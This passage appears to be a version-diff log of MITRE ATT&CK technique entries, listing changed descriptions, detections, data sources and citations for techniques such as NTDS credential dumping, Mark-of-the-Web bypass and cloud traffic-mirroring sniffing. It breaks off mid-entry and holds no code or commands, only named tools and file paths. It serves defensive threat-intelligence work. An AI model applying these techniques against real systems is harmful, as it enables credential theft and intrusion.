x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsMiriam Wiesner, @miriamxyra, Microsoft Security
x_mitre_data_sourcesGroup: Group Enumeration
x_mitre_data_sourcesProcess: OS API Execution
x_mitre_data_sourcesProcess: Process Creation

[T1074.001] Data Staged: Local Data Staging

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may stage collected data in a central location ot1Adversaries may stage collected data in a central location o
>r directory on the local system prior to Exfiltration. Data >r directory on the local system prior to Exfiltration. Data 
>may be kept in separate files or combined into one file thro>may be kept in separate files or combined into one file thro
>ugh techniques such as [Archive Collected Data](https://atta>ugh techniques such as [Archive Collected Data](https://atta
>ck.mitre.org/techniques/T1560). Interactive command shells m>ck.mitre.org/techniques/T1560). Interactive command shells m
>ay be used, and common functionality within [cmd](https://at>ay be used, and common functionality within [cmd](https://at
>tack.mitre.org/software/S0106) and bash may be used to copy >tack.mitre.org/software/S0106) and bash may be used to copy 
>data into a staging location.>data into a staging location.  Adversaries may also stage co
 >llected data in various available formats/locations of a sys
 >tem, including local storage databases/repositories or the W
 >indows Registry.(Citation: Prevailion DarkWatchman 2021)

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_contributors['Massimiliano Romano, BT Security']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-05-26 19:23:54.854000+00:002022-04-21 16:07:10.829000+00:00
descriptionAdversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location. Adversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.(Citation: Prevailion DarkWatchman 2021)
x_mitre_detectionProcesses that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging. Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging. Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). Consider monitoring accesses and modifications to local storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Prevailion DarkWatchman 2021', 'description': 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A new evolution in fileless techniques. Retrieved January 10, 2022.', 'url': 'https://www.prevailion.com/darkwatchman-new-fileless-techniques/'}
x_mitre_data_sourcesWindows Registry: Windows Registry Key Modification
x_mitre_data_sourcesCommand: Command Execution
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesCommand: Command Execution

[T1069.001] Permission Groups Discovery: Local Groups

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_contributors['Harshal Tupsamudre, Qualys', 'Miriam Wiesner, @miriamxyra, Microsoft Security']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2020-03-26 17:48:27.871000+00:002022-08-25 13:03:08.484000+00:00
x_mitre_data_sources[3]Command: Command ExecutionGroup: Group Enumeration
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesCommand: Command Execution
x_mitre_data_sourcesProcess: OS API Execution
x_mitre_data_sourcesGroup: Group Enumeration

[T1204.002] User Execution: Malicious File

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1An adversary may rely upon a user opening a malicious file it1An adversary may rely upon a user opening a malicious file i
>n order to gain execution. Users may be subjected to social >n order to gain execution. Users may be subjected to social 
>engineering to get them to open a file that will lead to cod>engineering to get them to open a file that will lead to cod
>e execution. This user action will typically be observed as >e execution. This user action will typically be observed as 
>follow-on behavior from [Spearphishing Attachment](https://a>follow-on behavior from [Spearphishing Attachment](https://a
>ttack.mitre.org/techniques/T1566/001). Adversaries may use s>ttack.mitre.org/techniques/T1566/001). Adversaries may use s
>everal types of files that require a user to execute them, i>everal types of files that require a user to execute them, i
>ncluding .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and>ncluding .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and
> .cpl.  Adversaries may employ various forms of [Masqueradin> .cpl.  Adversaries may employ various forms of [Masqueradin
>g](https://attack.mitre.org/techniques/T1036) on the file to>g](https://attack.mitre.org/techniques/T1036) and [Obfuscate
> increase the likelihood that a user will open it.  While [M>d Files or Information](https://attack.mitre.org/techniques/
>alicious File](https://attack.mitre.org/techniques/T1204/002>T1027) to increase the likelihood that a user will open and 
>) frequently occurs shortly after Initial Access it may occu>successfully execute a malicious file. These methods may inc
>r at other phases of an intrusion, such as when an adversary>lude using a familiar naming convention and/or password prot
> places a file in a shared directory or on a user's desktop >ecting the file and supplying instructions to a user on how 
>hoping that a user will click on it. This activity may also >to open it.(Citation: Password Protected Word Docs)   While 
>be seen shortly after [Internal Spearphishing](https://attac>[Malicious File](https://attack.mitre.org/techniques/T1204/0
>k.mitre.org/techniques/T1534).>02) frequently occurs shortly after Initial Access it may oc
 >cur at other phases of an intrusion, such as when an adversa
 >ry places a file in a shared directory or on a user's deskto
 >p hoping that a user will click on it. This activity may als
 >o be seen shortly after [Internal Spearphishing](https://att
 >ack.mitre.org/techniques/T1534).
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_contributors['TruKno']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_remote_supportFalse
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2021-07-21 23:10:47.193000+00:002022-05-20 17:19:50.801000+00:00
descriptionAn adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl. Adversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036) on the file to increase the likelihood that a user will open it. While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl. Adversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036) and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to increase the likelihood that a user will open and successfully execute a malicious file. These methods may include using a familiar naming convention and/or password protecting the file and supplying instructions to a user on how to open it.(Citation: Password Protected Word Docs) While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).
x_mitre_data_sources[0]Process: Process CreationFile: File Creation
x_mitre_data_sources[1]File: File CreationProcess: Process Creation
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Password Protected Word Docs', 'description': "Lawrence Abrams. (2017, July 12). PSA: Don't Open SPAM Containing Password Protected Word Docs. Retrieved January 5, 2022.", 'url': 'https://www.bleepingcomputer.com/news/security/psa-dont-open-spam-containing-password-protected-word-docs/'}

[T1553.005] Subvert Trust Controls: Mark-of-the-Web Bypass

Current version: 1.1

Version changed from: 1.0 → 1.1

New Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2021-04-13 22:47:08.289000+00:002022-05-05 04:59:32.535000+00:00
external_references[1]['source_name']Microsoft Zone.Identifier 2020Beek Use of VHD Dec 2020
external_references[1]['description']Microsoft. (2020, August 31). Zone.Identifier Stream Name. Retrieved February 22, 2021.Beek, C. (2020, December 3). Investigating the Use of VHD Files By Cybercriminals. Retrieved February 22, 2021.
external_references[1]['url']https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/6e3f7352-d11c-4d76-8c39-2516a9df36e8https://medium.com/swlh/investigating-the-use-of-vhd-files-by-cybercriminals-3f1f08304316
external_references[2]['source_name']Beek Use of VHD Dec 2020Outflank MotW 2020
external_references[2]['description']Beek, C. (2020, December 3). Investigating the Use of VHD Files By Cybercriminals. Retrieved February 22, 2021.Hegt, S. (2020, March 30). Mark-of-the-Web from a red team’s perspective. Retrieved February 22, 2021.
external_references[2]['url']https://medium.com/swlh/investigating-the-use-of-vhd-files-by-cybercriminals-3f1f08304316https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective/
external_references[3]['source_name']Outflank MotW 2020Intezer Russian APT Dec 2020
external_references[3]['description']Hegt, S. (2020, March 30). Mark-of-the-Web from a red team’s perspective. Retrieved February 22, 2021.Kennedy, J. (2020, December 9). A Zebra in Gopher's Clothing: Russian APT Uses COVID-19 Lures to Deliver Zebrocy. Retrieved February 22, 2021.
external_references[3]['url']https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective/https://www.intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/
external_references[4]['source_name']Intezer Russian APT Dec 2020Microsoft Zone.Identifier 2020
external_references[4]['description']Kennedy, J. (2020, December 9). A Zebra in Gopher's Clothing: Russian APT Uses COVID-19 Lures to Deliver Zebrocy. Retrieved February 22, 2021.Microsoft. (2020, August 31). Zone.Identifier Stream Name. Retrieved February 22, 2021.
external_references[4]['url']https://www.intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/6e3f7352-d11c-4d76-8c39-2516a9df36e8
x_mitre_data_sources[0]File: File CreationFile: File Metadata
x_mitre_data_sources[1]File: File MetadataFile: File Creation
x_mitre_defense_bypassed[0]Anti-virus, Application controlAnti-virus
x_mitre_detectionMonitor compressed/archive and image files downloaded from the Internet as the contents may not be tagged with the MOTW. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities.Monitor compressed/archive and image files downloaded from the Internet as the contents may not be tagged with the MOTW. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities.(Citation: Disable automount for ISO)
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Disable automount for ISO', 'description': 'wordmann. (2022, February 8). Disable Disc Imgage. Retrieved February 8, 2022.', 'url': 'https://gist.github.com/wdormann/fca29e0dcda8b5c0472e73e10c78c3e7'}
x_mitre_defense_bypassedApplication Control

[T1003.003] OS Credential Dumping: NTDS

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may attempt to access or create a copy of the Act1Adversaries may attempt to access or create a copy of the Ac
>tive Directory domain database in order to steal credential >tive Directory domain database in order to steal credential 
>information, as well as obtain other information about domai>information, as well as obtain other information about domai
>n members such as devices, users, and access rights. By defa>n members such as devices, users, and access rights. By defa
>ult, the NTDS file (NTDS.dit) is located in <code>%SystemRoo>ult, the NTDS file (NTDS.dit) is located in <code>%SystemRoo
>t%\NTDS\Ntds.dit</code> of a domain controller.(Citation: Wi>t%\NTDS\Ntds.dit</code> of a domain controller.(Citation: Wi
>kipedia Active Directory)  In addition to looking for NTDS f>kipedia Active Directory)  In addition to looking for NTDS f
>iles on active Domain Controllers, attackers may search for >iles on active Domain Controllers, adversaries may search fo
>backups that contain the same or similar information.(Citati>r backups that contain the same or similar information.(Cita
>on: Metcalf 2015)  The following tools and techniques can be>tion: Metcalf 2015)  The following tools and techniques can 
> used to enumerate the NTDS file and the contents of the ent>be used to enumerate the NTDS file and the contents of the e
>ire Active Directory hashes.  * Volume Shadow Copy * secrets>ntire Active Directory hashes.  * Volume Shadow Copy * secre
>dump.py * Using the in-built Windows tool, ntdsutil.exe * In>tsdump.py * Using the in-built Windows tool, ntdsutil.exe * 
>voke-NinjaCopy >Invoke-NinjaCopy 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-12-14 23:08:02.782000+00:002022-03-08 21:00:52.774000+00:00
descriptionAdversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in %SystemRoot%\NTDS\Ntds.dit of a domain controller.(Citation: Wikipedia Active Directory) In addition to looking for NTDS files on active Domain Controllers, attackers may search for backups that contain the same or similar information.(Citation: Metcalf 2015) The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes. * Volume Shadow Copy * secretsdump.py * Using the in-built Windows tool, ntdsutil.exe * Invoke-NinjaCopy Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in %SystemRoot%\NTDS\Ntds.dit of a domain controller.(Citation: Wikipedia Active Directory) In addition to looking for NTDS files on active Domain Controllers, adversaries may search for backups that contain the same or similar information.(Citation: Metcalf 2015) The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes. * Volume Shadow Copy * secretsdump.py * Using the in-built Windows tool, ntdsutil.exe * Invoke-NinjaCopy
x_mitre_data_sources[0]File: File AccessCommand: Command Execution
x_mitre_data_sources[1]Command: Command ExecutionFile: File Access
x_mitre_version1.01.1

[T1599] Network Boundary Bridging

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may bridge network boundaries by compromising pet1Adversaries may bridge network boundaries by compromising pe
>rimeter network devices. Breaching these devices may enable >rimeter network devices or internal devices responsible for 
>an adversary to bypass restrictions on traffic routing that >network segmentation. Breaching these devices may enable an 
>otherwise separate trusted and untrusted networks.  Devices >adversary to bypass restrictions on traffic routing that oth
>such as routers and firewalls can be used to create boundari>erwise separate trusted and untrusted networks.  Devices suc
>es between trusted and untrusted networks.  They achieve thi>h as routers and firewalls can be used to create boundaries 
>s by restricting traffic types to enforce organizational pol>between trusted and untrusted networks.  They achieve this b
>icy in an attempt to reduce the risk inherent in such connec>y restricting traffic types to enforce organizational policy
>tions.  Restriction of traffic can be achieved by prohibitin> in an attempt to reduce the risk inherent in such connectio
>g IP addresses, layer 4 protocol ports, or through deep pack>ns.  Restriction of traffic can be achieved by prohibiting I
>et inspection to identify applications.  To participate with>P addresses, layer 4 protocol ports, or through deep packet 
> the rest of the network, these devices can be directly addr>inspection to identify applications.  To participate with th
>essable or transparent, but their mode of operation has no b>e rest of the network, these devices can be directly address
>earing on how the adversary can bypass them when compromised>able or transparent, but their mode of operation has no bear
>.  When an adversary takes control of such a boundary device>ing on how the adversary can bypass them when compromised.  
>, they can bypass its policy enforcement to pass normally pr>When an adversary takes control of such a boundary device, t
>ohibited traffic across the trust boundary between the two s>hey can bypass its policy enforcement to pass normally prohi
>eparated networks without hinderance.  By achieving sufficie>bited traffic across the trust boundary between the two sepa
>nt rights on the device, an adversary can reconfigure the de>rated networks without hinderance.  By achieving sufficient 
>vice to allow the traffic they want, allowing them to then f>rights on the device, an adversary can reconfigure the devic
>urther achieve goals such as command and control via [Multi->e to allow the traffic they want, allowing them to then furt
>hop Proxy](https://attack.mitre.org/techniques/T1090/003) or>her achieve goals such as command and control via [Multi-hop
> exfiltration of data via [Traffic Duplication](https://atta> Proxy](https://attack.mitre.org/techniques/T1090/003) or ex
>ck.mitre.org/techniques/T1020/001).  In the cases where a bo>filtration of data via [Traffic Duplication](https://attack.
>rder device separates two separate organizations, the advers>mitre.org/techniques/T1020/001). Adversaries may also target
>ary can also facilitate lateral movement into new victim env> internal devices responsible for network segmentation and a
>ironments.>buse these in conjunction with [Internal Proxy](https://atta
 >ck.mitre.org/techniques/T1090/001) to achieve the same goals
 >.(Citation: Kaspersky ThreatNeedle Feb 2021)  In the cases w
 >here a border device separates two separate organizations, t
 >he adversary can also facilitate lateral movement into new v
 >ictim environments.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['Administrator']
values_changed
STIX FieldOld valueNew Value
modified2020-10-21 01:45:59.246000+00:002022-05-05 05:05:44.200000+00:00
descriptionAdversaries may bridge network boundaries by compromising perimeter network devices. Breaching these devices may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks. Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks. They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections. Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications. To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised. When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance. By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.Adversaries may bridge network boundaries by compromising perimeter network devices or internal devices responsible for network segmentation. Breaching these devices may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks. Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks. They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections. Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications. To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised. When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance. By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). Adversaries may also target internal devices responsible for network segmentation and abuse these in conjunction with [Internal Proxy](https://attack.mitre.org/techniques/T1090/001) to achieve the same goals.(Citation: Kaspersky ThreatNeedle Feb 2021) In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.
x_mitre_data_sources[0]Network Traffic: Network Traffic FlowNetwork Traffic: Network Traffic Content
x_mitre_data_sources[1]Network Traffic: Network Traffic ContentNetwork Traffic: Network Traffic Flow
x_mitre_defense_bypassed[0]Router ACLFirewall
x_mitre_defense_bypassed[1]FirewallSystem Access Controls
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Kaspersky ThreatNeedle Feb 2021', 'description': 'Vyacheslav Kopeytsev and Seongsu Park. (2021, February 25). Lazarus targets defense industry with ThreatNeedle. Retrieved October 27, 2021.', 'url': 'https://securelist.com/lazarus-threatneedle/100803/'}

[T1040] Network Sniffing

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1Adversaries may sniff network traffic to capture informationt1Adversaries may sniff network traffic to capture information
> about an environment, including authentication material pas> about an environment, including authentication material pas
>sed over the network. Network sniffing refers to using the n>sed over the network. Network sniffing refers to using the n
>etwork interface on a system to monitor or capture informati>etwork interface on a system to monitor or capture informati
>on sent over a wired or wireless connection. An adversary ma>on sent over a wired or wireless connection. An adversary ma
>y place a network interface into promiscuous mode to passive>y place a network interface into promiscuous mode to passive
>ly access data in transit over the network, or use span port>ly access data in transit over the network, or use span port
>s to capture a larger amount of data.  Data captured via thi>s to capture a larger amount of data.  Data captured via thi
>s technique may include user credentials, especially those s>s technique may include user credentials, especially those s
>ent over an insecure, unencrypted protocol. Techniques for n>ent over an insecure, unencrypted protocol. Techniques for n
>ame service resolution poisoning, such as [LLMNR/NBT-NS Pois>ame service resolution poisoning, such as [LLMNR/NBT-NS Pois
>oning and SMB Relay](https://attack.mitre.org/techniques/T15>oning and SMB Relay](https://attack.mitre.org/techniques/T15
>57/001), can also be used to capture credentials to websites>57/001), can also be used to capture credentials to websites
>, proxies, and internal systems by redirecting traffic to an>, proxies, and internal systems by redirecting traffic to an
> adversary.  Network sniffing may also reveal configuration > adversary.  Network sniffing may also reveal configuration 
>details, such as running services, version numbers, and othe>details, such as running services, version numbers, and othe
>r network characteristics (e.g. IP addresses, hostnames, VLA>r network characteristics (e.g. IP addresses, hostnames, VLA
>N IDs) necessary for subsequent Lateral Movement and/or Defe>N IDs) necessary for subsequent Lateral Movement and/or Defe
>nse Evasion activities.>nse Evasion activities.  In cloud-based environments, advers
 >aries may still be able to use traffic mirroring services to
 > sniff network traffic from virtual machines. For example, A
 >WS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap a
 >llow users to define specified instances to collect traffic 
 >from and specified targets to send collected traffic to.(Cit
 >ation: AWS Traffic Mirroring) (Citation: GCP Packet Mirrorin
 >g) (Citation: Azure Virtual Network TAP) Often, much of this
 > traffic will be in cleartext due to the use of TLS terminat
 >ion at the load balancer level to reduce the strain of encry
 >pting and decrypting traffic.(Citation: Rhino Security Labs 
 >AWS VPC Traffic Mirroring) (Citation: SpecterOps AWS Traffic
 > Mirroring) The adversary can then use exfiltration techniqu
 >es such as Transfer Data to Cloud Account in order to access
 > the sniffed traffic. (Citation: Rhino Security Labs AWS VPC
 > Traffic Mirroring)

New Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_contributors['Oleg Kolesnikov, Securonix', 'Tiago Faria, 3CORESec']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesAmazon Web Services. (n.d.). How Traffic Mirroring works. Retrieved March 17, 2022.
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['Administrator', 'SYSTEM']
external_referencesCAPEC-158
values_changed
STIX FieldOld valueNew Value
modified2021-04-02 17:51:59.236000+00:002022-05-20 17:32:27.146000+00:00
descriptionAdversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary. Network sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities.Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary. Network sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities. In cloud-based environments, adversaries may still be able to use traffic mirroring services to sniff network traffic from virtual machines. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.(Citation: AWS Traffic Mirroring) (Citation: GCP Packet Mirroring) (Citation: Azure Virtual Network TAP) Often, much of this traffic will be in cleartext due to the use of TLS termination at the load balancer level to reduce the strain of encrypting and decrypting traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring) (Citation: SpecterOps AWS Traffic Mirroring) The adversary can then use exfiltration techniques such as Transfer Data to Cloud Account in order to access the sniffed traffic. (Citation: Rhino Security Labs AWS VPC Traffic Mirroring)
external_references[1]['source_name']capecAWS Traffic Mirroring
external_references[1]['url']https://capec.mitre.org/data/definitions/158.htmlhttps://docs.aws.amazon.com/vpc/latest/mirroring/traffic-mirroring-how-it-works.html
x_mitre_detectionDetecting the events leading up to sniffing network traffic may be the best method of detection. From the host level, an adversary would likely need to perform a [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) attack against other devices on a wired network in order to capture traffic that was not to or from the current compromised system. This change in the flow of information is detectable at the enclave network level. Monitor for ARP spoofing and gratuitous ARP broadcasts. Detecting compromised network devices is a bit more challenging. Auditing administrator logins, configuration changes, and device images is required to detect malicious changes.Detecting the events leading up to sniffing network traffic may be the best method of detection. From the host level, an adversary would likely need to perform a [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) attack against other devices on a wired network in order to capture traffic that was not to or from the current compromised system. This change in the flow of information is detectable at the enclave network level. Monitor for ARP spoofing and gratuitous ARP broadcasts. Detecting compromised network devices is a bit more challenging. Auditing administrator logins, configuration changes, and device images is required to detect malicious changes. In cloud-based environments, monitor for the creation of new traffic mirrors or modification of existing traffic mirrors.
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'GCP Packet Mirroring', 'description': 'Google Cloud. (n.d.). Packet Mirroring overview. Retrieved March 17, 2022.', 'url': 'https://cloud.google.com/vpc/docs/packet-mirroring'}
external_references{'source_name': 'SpecterOps AWS Traffic Mirroring', 'description': 'Luke Paine. (2020, March 11). Through the Looking Glass — Part 1. Retrieved March 17, 2022.', 'url': 'https://posts.specterops.io/through-the-looking-glass-part-1-f539ae308512'}
external_references{'source_name': 'Azure Virtual Network TAP', 'description': 'Microsoft. (2022, February 9). Virtual network TAP. Retrieved March 17, 2022.', 'url': 'https://docs.microsoft.com/en-us/azure/virtual-network/virtual-network-tap-overview'}
external_references{'source_name': 'Rhino Security Labs AWS VPC Traffic Mirroring', 'description': 'Spencer Gietzen. (2019, September 17). Abusing VPC Traffic Mirroring in AWS. Retrieved March 17, 2022.', 'url': 'https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws/'}
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/158.html', 'external_id': 'CAPEC-158'}
x_mitre_platformsIaaS

[T1499.001] Endpoint Denial of Service: OS Exhaustion Flood

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may target the operating system (OS) for a DoS at1Adversaries may launch a denial of service (DoS) attack targ
>ttack, since the (OS) is responsible for managing the finite>eting an endpoint's operating system (OS). A system's OS is 
> resources on a system. These attacks do not need to exhaust>responsible for managing the finite resources as well as pre
> the actual resources on a system since they can simply exha>venting the entire system from being overwhelmed by excessiv
